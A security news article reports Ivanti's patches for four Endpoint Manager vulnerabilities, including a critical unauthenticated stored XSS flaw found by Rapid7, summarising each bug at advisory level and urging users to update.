Ivanti on Tuesday announced patches for four vulnerabilities in Endpoint Manager (EPM), including a critical-severity flaw leading to remote code execution (RCE).
The security defect, tracked as CVE-2025-10573 (CVSS score of 9.6), is described as a stored cross-site scripting (XSS) issue that can be exploited without authentication.
Providing organizations with remote administration, vulnerability scanning, and management of connected systems, Ivanti EPM includes an API that consumes device scan data.
The critical EPM vulnerability allows attackers to submit device scan data containing malicious payloads that would be processed and embedded in the web dashboard, says Rapid7, which discovered and reported the bug in August.
When an administrator accesses the dashboard interface and views the device information, the payload triggers client-side JavaScript execution, allowing the attacker to gain control of the administrator’s session, the company explains.
The bug has been addressed with the release of Ivanti EPM 2024 SU4 SR1, which also addresses three high-severity bugs.
The first, CVE-2025-13659, is described as the improper control of dynamically managed code resources, which could allow remote, unauthenticated attackers to write arbitrary files on the server.
Successful exploitation of the security defect could lead to RCE, but user interaction is required, Ivanti notes in its advisory.
The second high-severity issue is CVE-2025-13661, a path traversal flaw that can be exploited remotely to write arbitrary files outside of the intended directory. Its exploitation requires authentication.
The third high-severity weakness is described as the “improper verification of cryptographic signatures in the patch management component” of EPM.
Tracked as CVE-2025-13662, it allows remote, unauthenticated attackers to achieve RCE, but requires user interaction.
Ivanti says it is not aware of any of these vulnerabilities being exploited in the wild. Users are advised to update to the latest versions of Ivanti EPM as soon as possible.
Related: High-Severity Vulnerabilities Patched by Ivanti and Zoom
Related: High-Severity Vulnerabilities Patched by Fortinet and Ivanti
Related: ZDI Drops 13 Unpatched Ivanti Endpoint Manager Vulnerabilities
